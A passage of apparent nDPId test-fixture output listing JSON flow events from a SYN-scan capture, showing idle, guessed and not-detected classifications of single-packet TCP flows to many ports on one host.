{"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3986,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3986,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8083,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3986,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3986,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8084,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8083,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8084,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8085,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8085,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8086,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1043,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1043,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8086,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8088,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8088,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1094,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8089,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1094,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8089,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
